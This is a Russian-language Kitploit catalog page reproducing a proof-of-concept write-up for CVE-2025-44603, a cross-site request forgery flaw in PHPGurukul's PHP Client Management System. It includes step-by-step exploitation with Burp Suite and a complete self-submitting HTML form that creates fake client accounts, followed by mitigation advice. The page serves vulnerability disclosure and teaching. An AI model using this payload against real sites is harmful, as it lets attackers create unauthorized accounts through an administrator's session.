Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-44603-CSRF-Leads_to_Create_FakeUsers — Доказательство концепции, демонстрирующее уязвимость CSRF в системе управления клиентами на PHP, с HTML-кодом эксплойта и стратегиями смягчения последствий для тестирования безопасности веб-приложений. | Kitploit
Инструменты/GitHubGitHub/moulish2004/cve-2025-44603-csrf-leads_to_create_fakeusers
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеОбучение и Образование
GitHubmoulish2004/cve-2025-44603-csrf-leads_to_create_fakeusers

CVE-2025-44603-CSRF-Leads_to_Create_FakeUsers

Доказательство концепции, демонстрирующее уязвимость CSRF в системе управления клиентами на PHP, с HTML-кодом эксплойта и стратегиями смягчения последствий для тестирования безопасности веб-приложений.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
11 год назадЕщё не проверено

CVE-2025-44603 (CSRF-уязвимость: приводит к созданию фальшивых клиентов)

Название проекта и URL репозитория: https://phpgurukul.com/client-management-system-using-php-mysql/

Название уязвимости: Межсайтовая подделка запроса (CSRF)

Затронутая версия: V1.2

Введение

Уязвимость межсайтовой подделки запроса (CSRF) существует в функциональности добавления клиента в системе управления клиентами, разработанной PHPGurukul. CSRF — это атака, при которой аутентифицированный пользователь обманным путем заставляет отправить вредоносный запрос веб-приложению. Это может привести к выполнению несанкционированных действий от имени пользователя. В этом отчете мы демонстрируем, как CSRF может быть использован для создания фальшивых пользователей в системе управления клиентами, и предлагаем стратегии смягчения последствий.

Настройка окружения

  • Локально размещенная система управления клиентами с использованием MySQL и PHP.
  • Функциональность добавления клиентов и их услуг.

Шаги эксплуатации CSRF

1. Вход как администратор

Используя предоставленные учетные данные, войдите в систему управления клиентами.

Вход как администратор

2. Добавление нового клиента

  • Выберите пункт «Добавить клиента».
  • Введите необходимые данные клиента.

Добавление нового клиента Ввод данных клиента

3. Перехват запроса на добавление клиента

  1. Перейдите к кнопке «Сохранить».
  2. Настройте Burp Suite для перехвата запросов.
  3. Нажмите «Сохранить» и перехватите HTTP-запрос до того, как он достигнет сервера.
  4. Отправьте перехваченный запрос на вкладку Repeater без сессионного cookie для анализа.

Перехват запроса в Burp Отправка в Repeater

CSRF-код для фальшивых клиентов

Ниже приведен HTML PoC для CSRF-атаки:

root@kitploit:~
<html>
  <body>
    <form action="http://localhost/clientms/admin/add-client.php" method="POST">
      <input type="hidden" name="accounttype" value="Active Account" />
      <input type="hidden" name="cname" value="moulimurugan" />
      <input type="hidden" name="comname" value="kppr" />
      <input type="hidden" name="address" value="vijayamangalam" />
      <input type="hidden" name="city" value="erode" />
      <input type="hidden" name="state" value="tamil" />
      <input type="hidden" name="zcode" value="638026" />
      <input type="hidden" name="wphnumber" value="968560710" />
      <input type="hidden" name="cellphnumber" value="6931052465" />
      <input type="hidden" name="ophnumber" value="9638560410" />
      <input type="hidden" name="email" value="[email protected]" />
      <input type="hidden" name="password" value="moulimurugan" />
      <input type="hidden" name="websiteadd" value="clientmsdb" />
      <input type="hidden" name="notes" value="Nil" />
      <input type="hidden" name="submit" value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Создание фальшивых клиентов

  • Измените существующие данные, чтобы создать фальшивых клиентов.

Добавление фальшивого пользователя 1 Добавление фальшивого пользователя 2

Тестирование CSRF PoC

  1. Откройте сгенерированную ссылку CSRF PoC в браузере.
  2. Откроется веб-страница с кнопкой «Отправить».
  3. Нажмите «Отправить», и запрос выполнится, создавая фальшивых клиентов.

Открытие PoC в браузере Нажатие кнопки отправки запроса

Подтверждение создания фальшивых клиентов

  • После отправки фальшивые клиенты появляются в панели администратора.

Фальшивые клиенты созданы Создано несколько пользователей

Стратегии смягчения последствий

Чтобы предотвратить CSRF-атаки, внедрите следующие меры:

  1. CSRF-токены
    • Используйте анти-CSRF токены во всех отправках форм и проверяйте их на стороне сервера.
  2. SameSite-куки
    • Устанавливайте сессионные cookie с атрибутами SameSite=Strict или SameSite=Lax.
  3. Проверка заголовков Referer и Origin
    • Проверяйте заголовки Referer и Origin перед обработкой запросов.
  4. Проверка аутентификации пользователя
    • Требуйте ввод CAPTCHA для критически важных действий, чтобы предотвратить автоматизированные атаки.
  5. Ограничение HTTP-методов
    • Используйте POST для конфиденциальных действий и избегайте обработки GET-запросов с побочными эффектами.

Заключение

В этом отчете показано, как CSRF-уязвимости могут быть использованы для создания несанкционированных клиентов в системе управления клиентами. Внедрение предложенных стратегий смягчения последствий поможет защитить приложение от подобных атак.

Скачать инструмент